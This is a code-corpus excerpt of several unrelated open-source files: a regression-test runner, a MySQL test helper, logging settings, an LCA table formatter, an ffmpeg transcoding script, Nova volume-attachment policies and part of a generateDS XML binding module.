for regex in regexes_to_ignore:
if re.search(regex,line) != None:
lines_to_remove.add(i)
for i in sorted(list(lines_to_remove), reverse=True):
list_of_lines.pop(i)
return list_of_lines
def compareFile(origFile, args):
origFileData = open(origFile).readlines()
origFileData = remove_regex_lines(origFileData)
newFile = origFile.replace('.orig','')
if not os.path.exists(newFile):
print 'File %s does not exist - Unable to perform file comparison' %(newFile)
passed = False
return passed
newFileData = open(newFile).readlines()
newFileData = remove_regex_lines(newFileData)
#diff = difflib.compare(newFileData, origFileData)
#if difflib.ndiff(newFileData, origFileData)
#if filecmp.cmp(newFile, origFile) == True:
if newFileData == origFileData:
#passedFiles.append(origFile)
passed = True
print "Files %s and %s match!" %(newFile, origFile)
else:
#failedFiles.append(origFile)
passed = False
print 'File %s DOES NOT MATCH' %(origFile)
if args.compare == True:
validChoice = False
while validChoice == False:
choice = raw_input('Files %s and %s differ. View differences (y,n,v)? ' %(newFile, origFile))
if choice == 'y':
ignoreStr = ' '.join(['-I %s' %(i) for i in regexes_to_ignore])
os.system('diff %s %s %s | less' %(ignoreStr, newFile, origFile))
validChoice = True
elif choice == 'v':
os.system('tkdiff %s %s' %(newFile, origFile))
validChoice = True
elif choice == 'n':
validChoice = True
return passed
def runTests(args):
for line in rawRegTests:
linesp = line.split()
title = linesp[0]
results[title]={}
directory = os.getcwd()+'/'+linesp[1]+'/'
script = ' '.join(linesp[2:])
regTests.append([title, directory, script])
passedFiles = []
failedFiles = []
with Chdir(directory):
print
origFiles = glob.glob('*orig')
if args.remove_old == True:
files_to_remove = [i.replace('.orig','') for i in origFiles]
for file_to_remove in files_to_remove:
print 'Removing', file_to_remove
os.system('rm %s' %(file_to_remove))
print "RUNNING TEST %s" %(linesp)
runCommand = '%s python %s > output' %(arunPath, script)
print "Run command: %s" %(runCommand)
#os.system('%s python %s > output' %(arunPath,script))
#print '%s python %s/%s' %(arunPath, directory, script)
start = time.time()
p=subprocess.Popen(runCommand,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd = directory, shell=True)
out, error = p.communicate()
print 'Test ran in %s seconds' %(time.time()-start)
#print out, error
results[title]['testPassed'] = True
if p.returncode == 0:
print "Exit status: Completed"
results[title]['exit_status'] = True
else:
print "Exit status: Failed"
print 'error %s' %(error)
results[title]['exit_status'] = False
results[title]['testPassed'] = False
for origFile in origFiles:
passed = compareFile(origFile, args)
if passed == True:
passedFiles.append(origFile)
else:
failedFiles.append(origFile)
results[title]['testPassed'] = False
results[title]['passedFiles'] = passedFiles
results[title]['failedFiles'] = failedFiles
nPassed = 0
nFailed = 0
print
print '==============='
print "RESULTS SUMMARY"
print '==============='
for test in regTests:
print "----Test %s Exit Status = %s ----" %(test[0], results[test[0]]['exit_status'])
print "%i file comparisons succeeded: %s" %(len(results[test[0]]['passedFiles']),
results[test[0]]['passedFiles'])
print "%i file comparisons failed: %s" %(len(results[test[0]]['failedFiles']), results[test[0]]['failedFiles'])
if results[test[0]]['testPassed'] == True:
nPassed += 1
else:
nFailed += 1
print
print '%i tests passed, %i tests failed' %(nPassed, nFailed)
if nFailed > 0:
print "TEST SUITE FAILED"
sys.exit(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Run regression tests for this module")
parser.add_argument('-c', '--compare',
help='Offer comparison options if file fails diff',
action='store_true')
parser.add_argument('-r', '--remove_old',
help='Remove existing files with .orig complements before running',
action='store_true')
args = parser.parse_args()
runTests(args)
| mit | -319,797,622,637,738,000 | 34.411765 | 119 | 0.547508 | false |
sssllliang/edx-analytics-pipeline | edx/analytics/tasks/tests/acceptance/services/db.py | 1 | 2440 |
import json
from contextlib import closing
from contextlib import contextmanager
import mysql.connector
from edx.analytics.tasks.url import get_target_from_url
# TODO: use a database that is unique to this particular test run to isolate it.
class DatabaseService(object):
def __init__(self, config, database_name):
self.credentials_file_url = config['credentials_file_url']
self.database_name = database_name
@property
def credentials(self):
if not hasattr(self, '_credentials'):
with get_target_from_url(self.credentials_file_url).open('r') as credentials_file:
self._credentials = json.load(credentials_file)
return self._credentials
@contextmanager
def cursor(self, explicit_db=True):
with self.connect(explicit_db=explicit_db) as conn:
with closing(conn.cursor()) as cur:
try:
yield cur
except:
conn.rollback()
raise
else:
conn.commit()
def execute_sql_file(self, file_path):
"""
Execute a file containing SQL statements.
Note that this *does not* use MySQL native mechanisms for parsing *.sql files. Instead it very naively parses
the statements out of the file itself.
"""
with self.cursor(explicit_db=True) as cur:
with open(file_path, 'r') as sql_file:
for _ignored in cur.execute(sql_file.read(), multi=True):
pass
def connect(self, explicit_db=True):
"""
Connect to the MySQL server.
Arguments:
connect(bool): Use a database for the connection. Set to false to create databases etc.
"""
kwargs = {
'host': self.credentials['host'],
'user': self.credentials['username'],
'password': self.credentials['password'],
}
if explicit_db:
kwargs['database'] = self.database_name
return closing(mysql.connector.connect(**kwargs))
def reset(self):
"""Create a testing database on the MySQL replacing any existing content with an empty database."""
with self.cursor(explicit_db=False) as cur:
cur.execute('DROP DATABASE IF EXISTS {0}'.format(self.database_name))
cur.execute('CREATE DATABASE {0}'.format(self.database_name))
| agpl-3.0 | -2,513,281,604,018,603,500 | 32.424658 | 117 | 0.602049 | false |
nickchen-mitac/fork | ava_settings.py | 1 | 1433 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
"""
Default settings which can be overridden by configuration files.
"""
GENERAL = {
"DEBUG": False,
}
WEBFRONT = {
"disabled": False,
"listen_port": 5080,
"listen_addr": "127.0.0.1",
"secure_listen_addr": "",
"secure_listen_port": 5443,
}
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"simple": {
"format": "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
}
},
"handlers": {
"console": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "simple"
},
"file_handler": {
"class": "logging.handlers.RotatingFileHandler",
"level": "INFO",
"formatter": "simple",
"filename": "${logs_dir}/ava.log",
"maxBytes": 1048576,
"backupCount": 2,
"encoding": "utf8"
}
},
"loggers": {
"ava": {
"level": "DEBUG",
"handlers": [
"console",
"file_handler"
],
"propagate": "no"
},
"avashell": {
"level": "DEBUG",
"handlers": [
"console",
"file_handler"
],
"propagate": "no"
},
"root": {
"level": "DEBUG",
"handlers": [
"console"
]
}
}
}
| apache-2.0 | -8,994,973,317,503,977,000 | 20.073529 | 82 | 0.467551 | false |
bkuczenski/lca-tools | antelope_reports/tables/base.py | 1 | 11488 | """
Functions for creating tables for useful / important comparisons. These are analogous to charts in that they
are forms of output and it's not clear where they belong.
Lists of tabular outputs:
* process or fragment Inventory
* compare process inventories
* compare allocations of a multioutput process
* compare LCIA factors for different methods
* compare an LCIA method with the components of one or more Lcia Results using it
Here's another thing: right now I'm using dynamic grid to show these in the window... but wouldn't it perhaps be
preferable to use pandas? doesn't pandas afford all sorts of useful features, like ...
um...
what is pandas good for again? for working with data frames. Not necessarily for creating data frames.
Most likely, I could modify dynamic_grid to *return* a dataframe instead of drawing a table.
"""
from collections import defaultdict
from pandas import DataFrame
def printable(tup, width=8):
out = []
for k in tup:
if isinstance(k, str):
out.append(k)
elif k is None:
out.append('')
else:
try:
g = '%*.3g' % (width, k)
except TypeError:
g = '%*.*s' % (width, width, '----')
out.append(g)
return tuple(out)
class BaseTableOutput(object):
"""
A prototype class for storing and returning tabular information. This should ultimately be adopted in places
where dynamic_grids are used, or where TeX or excel tables are produced (like in lca_matrix foreground output
generators) but for now it is just being used to provide some separation of concerns for the flowables super-grid.
At the heart is a dict whose key is a 2-tuple of (row signifier, column index). The row signifier can be any
hashable object, but the column indices are always sequential. re-ordering columns is something we do not feel
particularly like enabling at the present time.
The user creates the table with initialization parameters as desired, and then builds out the table by adding
columns in sequence.
The table has an inclusion criterion for the iterables (which could be None)-- if the criterion is met, the object
is added; if not, it is skipped. The criterion can change, but (since the table contents are static) this will not
result in columns being re-iterated.
Subclasses MAY redefine:
_returns_sets: determines whether each grid item is singly or multiply valued
Subclasses MUST implement:
_near_headings -- column names for left-side headings
_generate_items(col) -- argument is a column iterable - generates items
_pull_row_from_item(item) -- argument is one of the objects returned by the column iteration, returns row key
_extract_data_from_item -- argument is an dict from the grid dict, returns either a dict or an immutable object
"""
_near_headings = '', # should be overridden
_far_headings = '', # should be overridden
_returns_sets = False
def _pull_row_from_item(self, item):
"""
Returns the row tuple from an item, for insertion into the rows set. meant to be overridden
:param item:
:return: always a tuple. default item,
"""
row = item
# if not self._returns_sets:
return row,
def _pull_note_from_item(self, item):
"""
Returns the "long" / descriptive text appended to the right-hand side of the table. should return a str.
Only used if _returns_sets is false (otherwise, the sets indicate the row + subrow labels)
This is may turn out to be totally silly / pointless.
:param item:
:return:
"""
return ''
def _generate_items(self, iterable):
"""
yields the items from a column entry. Meant to be overridden.
:param iterable:
:return:
"""
for item in iterable:
if self._criterion(item):
yield item
def _extract_data_from_item(self, item):
"""
note: dict item is a list of components
Determines how to get the data point from the item/list. Meant to be overridden.
If self._returns_sets is true, should return a dict. Else should return an immutable.
:param item:
:return: a string
"""
return item
def _header_row(self):
"""
Returns a tuple of columns for the header row
:return:
"""
header = self._near_headings
for i, _ in enumerate(self._columns):
header += ('C%d' % i),
header += self._far_headings # placeholder for row notes / subitem keys
return header
def _build_near_header(self, row, prev):
the_row = []
for i, _ in enumerate(self._near_headings):
if prev is not None:
if prev[i] == row[i]:
the_row.append('""')
continue
the_row.append('%s' % row[i])
return the_row
def _build_row(self, row, prev=None):
"""
Returns a single row as a tuple.
:param row:
:param prev: [None] previous row printed (input, not output). Used to suppress header output for repeat entries.
:return:
"""
# first build the near header
the_row = self._build_near_header(row, prev)
data_keys = set()
data_vals = []
# first pass: get all the data / keys
for i, _ in enumerate(self._columns):
data = self._extract_data_from_item(self._d[row, i])
if isinstance(data, dict):
if not self._returns_sets:
raise TypeError('multiple values returned but subclass does not allow them!')
for k in data.keys():
data_keys.add(k)
data_vals.append(data)
# second pass: build the sub-table by rows
if self._returns_sets:
the_rows = []
_ftt = True # first time through
keys = tuple(sorted(data_keys, key=lambda x: x[-2]))
for k in keys:
if not _ftt:
the_row = ['' for i in range(len(self._near_headings))]
for i, _ in enumerate(self._columns):
if k in data_vals[i]:
the_row.append(data_vals[i][k])
else:
the_row.append(None)
the_row.append(k)
if _ftt:
the_row.append(self._notes[row])
else:
the_row.append('')
the_rows.append(the_row)
_ftt = False
return the_rows
else:
the_row.extend(data_vals)
# add notes
the_row.append(self._notes[row])
return the_row
def __init__(self, *args, criterion=None):
"""
Provide 0 or more positional arguments as data columns; add data columns later with add_column(arg)
:param args: sequential data columns
:param criterion: A callable expression that returns true if a given
"""
self._d = defaultdict(list)
if callable(criterion):
self._criterion = criterion
else:
if criterion is not None:
print('Ignoring non-callable criterion')
self._criterion = lambda x: True
self._rows = set() # set of valid keys to dict
self._notes = dict()
self._columns = [] # list of columns in the order added
# a valid reference consists of (x, y) where x in self._rows and y < len(self._columns)
for arg in args:
self.add_column(arg)
def _add_rowitem(self, col_idx, item, row=None):
if row is None:
row = self._pull_row_from_item(item)
self._rows.add(row)
if row not in self._notes:
self._notes[row] = self._pull_note_from_item(item)
self._d[row, col_idx].append(item)
def add_column(self, arg):
col_idx = len(self._columns)
for k in self._generate_items(arg):
self._add_rowitem(col_idx, k)
self._columns.append(arg)
def _sorted_rows(self):
for row in sorted(self._rows, key=lambda x: tuple([str(k) for k in x])):
yield row
def text(self, width=10, hdr_width=24, max_width=112, expanded=True):
"""
Outputs the table in text format
:return: nothing.
"""
header = self._header_row()
prev = None
body = []
width = max(6, width)
wds = [len(header[i]) for i in range(len(self._near_headings))]
# determine column widths
for row in self._sorted_rows():
prt_row = self._build_row(row, prev=prev)
if self._returns_sets:
wds = [min(max(wds[i], len('%s' % prt_row[0][i])), hdr_width) for i in range(len(self._near_headings))]
else:
wds = [min(max(wds[i], len('%s' % prt_row[i])), hdr_width) for i in range(len(self._near_headings))]
body.append(prt_row)
prev = row
# build display string
rem_width = max_width
fmt = ''
for i in wds:
rem_width -= i
fmt += '%%-%d.%ds ' % (i, i)
rem_width -= 1
for i in range(len(self._columns)):
rem_width -= width
fmt += '%%-%d.%ds ' % (width, width)
rem_width -= 1
if rem_width < 0:
# uh oh negative rem width: widen freely; set remainder to 10 chars
max_width -= (rem_width - 10)
rem_width = 10
fmt += '%%-%d.%ds' % (rem_width, rem_width)
if self._returns_sets:
fmt += ' %s'
print(fmt % header)
print('-' * max_width)
for row in body:
if self._returns_sets:
for subrow in row: # sorted(row, key=lambda x: x[-2])
print(fmt % printable(subrow, width=width))
else:
print(fmt % printable(row, width=width))
print(fmt % header)
print('\nColumns:')
for i, c in enumerate(self._columns):
print('C%d: %s' % (i, c))
def dataframe(self):
df = DataFrame(columns=self._header_row())
prev = None
for row in self._sorted_rows():
if self._returns_sets:
for r in self._build_row(row):
d = dict(zip(self._header_row(), printable(r)))
df = df.append(d, ignore_index=True)
else:
d = dict(zip(self._header_row(), printable(self._build_row(row, prev=prev))))
df = df.append(d, ignore_index=True)
prev = row
return df
def to_excel(self, xl_writer, sheetname, width_scaling=0.75):
"""
Must supply a pandas XlsxWriter. This routine does not save the document.
:param xl_writer:
:param sheetname:
:param width_scaling:
:return:
"""
df = self.dataframe()
df.to_excel(xl_writer, sheet_name=sheetname)
sht = xl_writer.sheets[sheetname]
for k in self._near_headings + self._far_headings:
ix = df.columns.tolist().index(k) + 1
mx = max([7, width_scaling * df[k].astype(str).str.len().max()])
sht.set_column(ix, ix, width=mx)
| gpl-2.0 | -5,190,139,048,839,691,000 | 34.9 | 120 | 0.566591 | false |
samhutchins/tools | video_production/transcode-for-edit.py | 1 | 1479 | #!/usr/bin/env python3.6
import os, argparse, subprocess
def main():
parser = argparse.ArgumentParser()
parser.add_argument("project")
args = parser.parse_args()
home = os.path.join(os.path.expanduser("~"), "Videos", "Mine", "WIP")
dest_dir = os.path.join(home, args.project, "footage")
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
videos = []
for root, _, files in os.walk(os.getcwd()):
for file in files:
videos.append(os.path.join(root, file))
videos = [x for x in videos if x[-4:].lower() == ".mov" or x[-4:].lower() == ".mp4"]
for video in videos:
transcode(video, dest_dir)
def transcode(video, dest_dir):
size = subprocess.check_output('ffprobe -v quiet -print_format csv=p=0 -select_streams v:0 -show_entries stream=height,width "' + video + '"').decode('utf-8').rstrip()
width = int(size.split(",")[0])
args = ""
if 1920 < width:
args = " -vf scale=1920:-1"
destination = get_filename(video, dest_dir)
command = 'ffmpeg -hide_banner -v error -stats -y -i "' + video + '" -vcodec prores -profile:v 3' + args + " " + destination
print("Transcoding " + os.path.basename(video))
subprocess.run(command)
def get_filename(file, dest_dir):
basename = os.path.basename(file)
filename = os.path.splitext(basename)[0]
return '"' + os.path.join(dest_dir, filename + ".mov") + '"'
if __name__ == "__main__":
main() | mit | -8,815,710,785,763,945,000 | 31.173913 | 171 | 0.601082 | false |
vmturbo/nova | nova/policies/volumes_attachments.py | 1 | 2496 | # Copyright 2016 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_policy import policy
from nova.policies import base
POLICY_ROOT = 'os_compute_api:os-volumes-attachments:%s'
volumes_attachments_policies = [
base.create_rule_default(
POLICY_ROOT % 'index',
base.RULE_ADMIN_OR_OWNER,
"List volume attachments for an instance",
[
{'method': 'GET',
'path': '/servers/{server_id}/os-volume_attachments'
}
]),
base.create_rule_default(
POLICY_ROOT % 'create',
base.RULE_ADMIN_OR_OWNER,
"Attach a volume to an instance",
[
{
'method': 'POST',
'path': '/servers/{server_id}/os-volume_attachments'
}
]),
base.create_rule_default(
POLICY_ROOT % 'show',
base.RULE_ADMIN_OR_OWNER,
"Show details of a volume attachment",
[
{
'method': 'GET',
'path':
'/servers/{server_id}/os-volume_attachments/{attachment_id}'
}
]),
policy.RuleDefault(
name=POLICY_ROOT % 'discoverable',
check_str=base.RULE_ANY),
base.create_rule_default(
POLICY_ROOT % 'update',
base.RULE_ADMIN_API,
"Update a volume attachment",
[
{
'method': 'PUT',
'path':
'/servers/{server_id}/os-volume_attachments/{attachment_id}'
}
]),
base.create_rule_default(
POLICY_ROOT % 'delete',
base.RULE_ADMIN_OR_OWNER,
"Detach a volume from an instance",
[
{
'method': 'DELETE',
'path':
'/servers/{server_id}/os-volume_attachments/{attachment_id}'
}
]),
]
def list_rules():
return volumes_attachments_policies
| apache-2.0 | 6,217,302,918,994,485,000 | 28.714286 | 78 | 0.555288 | false |
RhubarbSin/arin-reg-rws | regrws/payload/org.py | 1 | 73155 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Tue Aug 6 14:52:51 2013 by generateDS.py version 2.10a.
#
# Copyright (C) 2011,2012,2013 American Registry for Internet Numbers
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR
# IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import sys
import getopt
import re as re_
import base64
import datetime as datetime_
etree_ = None
Verbose_import_ = False
(
XMLParser_import_none, XMLParser_import_lxml,
XMLParser_import_elementtree
) = range(3)
XMLParser_import_library = None
try:
# lxml
from lxml import etree as etree_
XMLParser_import_library = XMLParser_import_lxml
if Verbose_import_:
print("running with lxml.etree")
except ImportError:
try:
# cElementTree from Python 2.5+
import xml.etree.cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree on Python 2.5+")
except ImportError:
try:
# ElementTree from Python 2.5+
import xml.etree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree on Python 2.5+")
except ImportError:
try:
# normal cElementTree install
import cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree")
except ImportError:
try:
# normal ElementTree install
import elementtree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree")
except ImportError:
raise ImportError(
"Failed to import ElementTree from any known place")
def parsexml_(*args, **kwargs):
if (XMLParser_import_library == XMLParser_import_lxml and
'parser' not in kwargs):
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
kwargs['parser'] = etree_.ETCompatXMLParser()
doc = etree_.parse(*args, **kwargs)
return doc
#
# User methods
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError, exp:
class GeneratedsSuper(object):
tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
class _FixedOffsetTZ(datetime_.tzinfo):
def __init__(self, offset, name):
self.__offset = datetime_.timedelta(minutes=offset)
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return None
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node, input_name=''):
return input_data
def gds_format_base64(self, input_data, input_name=''):
return base64.b64encode(input_data)
def gds_validate_base64(self, input_data, node, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_integer_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of integers')
return input_data
def gds_format_float(self, input_data, input_name=''):
return '%f' % input_data
def gds_validate_float(self, input_data, node, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_float_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of floats')
return input_data
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_double_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of doubles')
return input_data
def gds_format_boolean(self, input_data, input_name=''):
return ('%s' % input_data).lower()
def gds_validate_boolean(self, input_data, node, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(
node,
'Requires sequence of booleans '
'("true", "1", "false", "0")')
return input_data
def gds_validate_datetime(self, input_data, node, input_name=''):
return input_data
def gds_format_datetime(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d.%s' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
@classmethod
def gds_parse_datetime(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'GMT')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt
def gds_validate_date(self, input_data, node, input_name=''):
return input_data
def gds_format_date(self, input_data, input_name=''):
_svalue = '%04d-%02d-%02d' % (
input_data.year,
input_data.month,
input_data.day,
)
try:
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
except AttributeError:
pass
return _svalue
@classmethod
def gds_parse_date(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'GMT')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
dt = datetime_.datetime.strptime(input_data, '%Y-%m-%d')
dt = dt.replace(tzinfo=tz)
return dt.date()
def gds_validate_time(self, input_data, node, input_name=''):
return input_data
def gds_format_time(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%02d:%02d:%02d' % (
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%02d:%02d:%02d.%s' % (
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
@classmethod
def gds_parse_time(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'GMT')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt.time()
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
@classmethod
def gds_reverse_node_mapping(cls, mapping):
return dict(((v, k) for k, v in mapping.iteritems()))
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = 'ascii'
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
#
# Support/utility functions.
#
def showIndent(outfile, level, pretty_print=True):
if pretty_print:
for idx in range(level):
outfile.write(' ')
def quote_xml(inStr):
if not inStr:
return ''
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
return s1
def quote_attrib(inStr):
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
if '"' in s1:
if "'" in s1:
s1 = '"%s"' % s1.replace('"', """)
else:
s1 = "'%s'" % s1
else:
s1 = '"%s"' % s1
return s1
def quote_python(inStr):
s1 = inStr
if s1.find("'") == -1:
if s1.find('\n') == -1:
return "'%s'" % s1
else:
return "'''%s'''" % s1
else:
if s1.find('"') != -1:
s1 = s1.replace('"', '\\"')
if s1.find('\n') == -1:
return '"%s"' % s1
else:
return '"""%s"""' % s1
def get_all_text_(node):
if node.text is not None:
text = node.text
else:
text = ''
for child in node:
if child.tail is not None:
text += child.tail
return text
def find_attr_value_(attr_name, node):
attrs = node.attrib
attr_parts = attr_name.split(':')
value = None
if len(attr_parts) == 1:
value = attrs.get(attr_name)
elif len(attr_parts) == 2:
prefix, name = attr_parts
namespace = node.nsmap.get(prefix)
if namespace is not None:
value = attrs.get('{%s}%s' % (namespace, name, ))
return value
class GDSParseError(Exception):
pass
def raise_parse_error(node, msg):
if XMLParser_import_library == XMLParser_import_lxml:
msg = '%s (element %s/line %d)' % (
msg, node.tag, node.sourceline, )
else:
msg = '%s (element %s)' % (msg, node.tag, )
raise GDSParseError(msg)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
TypeBase64 = 8
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
